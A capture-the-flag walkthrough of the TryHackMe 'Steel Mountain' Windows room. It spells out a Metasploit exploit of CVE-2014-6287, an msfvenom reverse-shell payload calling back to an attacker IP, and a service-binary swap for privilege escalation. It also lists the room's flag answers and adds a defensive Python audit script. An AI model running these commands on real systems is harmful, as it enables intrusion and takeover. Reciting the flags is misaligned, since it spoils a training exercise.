Steel Mountain TryHackMe writeup

Hack into a Mr. Robot themed Windows machine. Use metasploit for initial access, utilise powershell for Windows privilege escalation enumeration and learn a new technique to get Administrator access.

Hello, I'm Ayush Bagde aka Overide, and welcome back to another TryHackMe writeup, this time for "Steel Mountain". Let's begin.

TASK 1: Introduction

In this room you will enumerate a Windows machine, gain initial access with Metasploit, use Powershell to further enumerate the machine and escalate your privileges to Administrator.

If you don’t have the right security tools and environment, deploy your own Kali Linux machine and control it in your browser, with our Kali Room.

Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up.

#1 Deploy the machine.

Who is the employee of the month?

Visiting the machine's IP address on port 80 shows the page below; viewing the page source gives you the answer.

Answer: Bill Harper

TASK 2: Initial Access

Now you have deployed the machine, lets get an initial shell!

Let’s start with the basic thing which is nmap.

$ sudo nmap -sV <ip>

As we can see, many ports are open. We already visited port 80 above and looked at its page source.

Another open port is 8080, running HttpFileServer httpd 2.3. Let's visit that port next.

#1 Scan the machine with nmap. What is the other port running a web server on?

Answer: 8080

Click the HttpFileServer 2.3 hyperlink and see what it shows.

#2. Take a look at the other web server. What file server is running?

Answer: rejetto http file server

Now search in any browser for "rejetto http file server 2.3 exploit cve details" and you'll get CVE-2014-6287.

#3 What is the CVE number to exploit this file server?

Answer: CVE-2014-6287

As you can see in the screenshot, a Metasploit module is listed. That means we can use the Metasploit console (msfconsole) to exploit this machine.

Once you are in the console, search for the CVE number and run the following.

use exploit/windows/http/rejetto_hfs_exec
set RHOST <machine IP>
set RPORT 8080
set LHOST <TryHackMe IP>
exploit

BOOM!!!

We got a shell, but it is a meterpreter shell and we want a Windows command prompt on the C drive. To get one, just type shell in meterpreter.

Let’s find the user.txt flag.

I found the flag in C:\Users\bill\Desktop.

#4 Use Metasploit to get an initial shell. What is the user flag?

Answer: b04763b6fcf51fcd7c13abc7db4fd365

TASK 3: Privilege Escalation

Now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root!

To enumerate this machine we will use a PowerShell script called PowerUp, whose purpose is to evaluate a Windows machine and determine any abnormalities: "PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations."

You can download the script here. Now you can use the upload command in Metasploit to upload the script.

Upload PowerUp.ps1 to the target machine. To do that, go back to the meterpreter shell: type exit in the Windows shell and you'll be back at the meterpreter prompt.

meterpreter > load powershell
meterpreter > powershell_shell

PS > . .\PowerUp.ps1
PS > Invoke-AllChecks

#2 Take close attention to the CanRestart option that is set to true. What is the name of the unquoted service path service name?

Answer: AdvancedSystemCareService9

Now use msfvenom to generate a reverse shell as a Windows executable.

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.8.116.182 LPORT=1234 -f exe -o ASCService.exe

Now we have to upload this ASCService.exe in place of the legitimate one. Then restart the service to get a shell as root.

To go from the PS prompt back to meterpreter, press CTRL + C to stop the process. Then go back to the old session and run the following.

meterpreter > shell
C:\> sc stop AdvancedSystemCareService9

Now exit back to meterpreter and upload the exploit, overwriting the legitimate binary:

meterpreter > upload ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"

Back in the Windows shell, start the now-malicious service:

C:\> sc start AdvancedSystemCareService9

Now we have the shell. Let's find the root flag: go to C:\Users\Administrator\Desktop and you'll find it there.

#4 What is the root flag?

Answer: 9af5f314f57607c00fd09803a587db80

TASK 4: Access and Escalation Without Metasploit

Now let’s complete the room without the use of Metasploit.

For this we will utilise powershell and winPEAS to enumerate the system and collect the relevant information to escalate to

To begin we shall be using the same CVE. However, this time let’s use this exploit.

*Note that you will need to have a web server and a netcat listener active at the same time in order for this to work!*

To begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub!

You will need to run the exploit twice. The first time will pull our netcat binary to the system and the second will execute our payload to gain a callback!

Congratulations, we’re now onto the system. Now we can pull winPEAS to the system using powershell -c.

Once we run winPEAS, it points us to the unquoted service path and also gives us the name of the service running from it.

#1 To begin we shall be using the same CVE. However, this time let’s use this exploit.

#2 What powershell -c command could we run to manually find out the service name?

Answer: powershell -c "Get-Service"
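PowerUp's unquoted-service-path finding in Task 3 and the winPEAS / Get-Service step above both come down to one check: a service whose PathName is not wrapped in double quotes and contains spaces. The script below is an added example, not part of this writeup or of PowerUp or winPEAS. It is written in Python so it runs anywhere against exported service data; the service records in it are constructed (only the IObit entry mirrors the Steel Mountain finding), and the `sc config ... binPath=` command it emits is the standard administrator remediation for quoting a service path. On a live host the same Name/PathName pairs come from `Get-CimInstance Win32_Service | Select-Object Name, PathName`.

```python
"""Audit Windows service binary paths for the unquoted-path misconfiguration
that PowerUp and winPEAS report, and emit the remediation for each finding.

Added example, not part of the original writeup. SAMPLE_SERVICES is a
constructed stand-in for Win32_Service Name/PathName output.
"""
import re

# Constructed sample records: (service name, PathName as stored in the registry).
SAMPLE_SERVICES = [
    ("AdvancedSystemCareService9",
     r"C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe"),
    ("Spooler", r"C:\Windows\System32\spoolsv.exe"),
    ("VendorAgent", r'"C:\Program Files\Vendor\agent.exe" --service'),
    ("BackupAgent", r"C:\Program Files\Vendor\Backup Agent\backup.exe -run"),
]

# Assumption: the executable portion of a PathName ends at the first ".exe";
# everything after it is treated as service arguments.
_EXE_RE = re.compile(r"^(.*?\.exe)(.*)$", re.IGNORECASE)


def unquoted_exe(pathname: str):
    """Return the executable part of an *unquoted* PathName, or None.

    A quoted PathName starts with a double quote, so the Service Control
    Manager knows exactly where the executable ends and no ambiguity exists.
    """
    p = pathname.strip()
    if not p or p.startswith('"'):
        return None
    m = _EXE_RE.match(p)
    return m.group(1) if m else None


def is_vulnerable(pathname: str) -> bool:
    """True when the path is unquoted and the executable's path contains a space."""
    exe = unquoted_exe(pathname)
    return exe is not None and " " in exe


def quoted_pathname(pathname: str) -> str:
    """Return the PathName with the executable wrapped in quotes, arguments kept."""
    m = _EXE_RE.match(pathname.strip())
    exe, args = m.group(1), m.group(2)
    return f'"{exe}"{args}'


def remediation_command(name: str, pathname: str) -> str:
    """Build the `sc config` command an administrator runs to quote the path.

    sc.exe requires a space after `binPath=` and the inner quotes escaped as \\".
    """
    fixed = quoted_pathname(pathname).replace('"', '\\"')
    return f'sc config {name} binPath= "{fixed}"'


def audit(services):
    """Return [(name, executable, remediation)] for every vulnerable service."""
    findings = []
    for name, pathname in services:
        if is_vulnerable(pathname):
            findings.append((name, unquoted_exe(pathname),
                             remediation_command(name, pathname)))
    return findings


if __name__ == "__main__":
    for name, exe, fix in audit(SAMPLE_SERVICES):
        print(f"[!] {name}: unquoted service path containing spaces -> {exe}")
        print(f"    fix: {fix}")
```

Run it as-is to see the two constructed services that get flagged, or feed it real Name/PathName pairs to audit a host. The check keys on the first `.exe` in the path to decide where the executable ends, so a service whose binary uses a different extension is not examined by this version.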

Try to do it on your own. We’ve owned another machine. Congratulations !!!

Connect to me on:

LinkedIn: https://www.linkedin.com/in/ayush-bagde-49660219a/

TryHackMe: https://tryhackme.com/p/Overide

Discord: https://discord.gg/5FzevEjqGj

and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
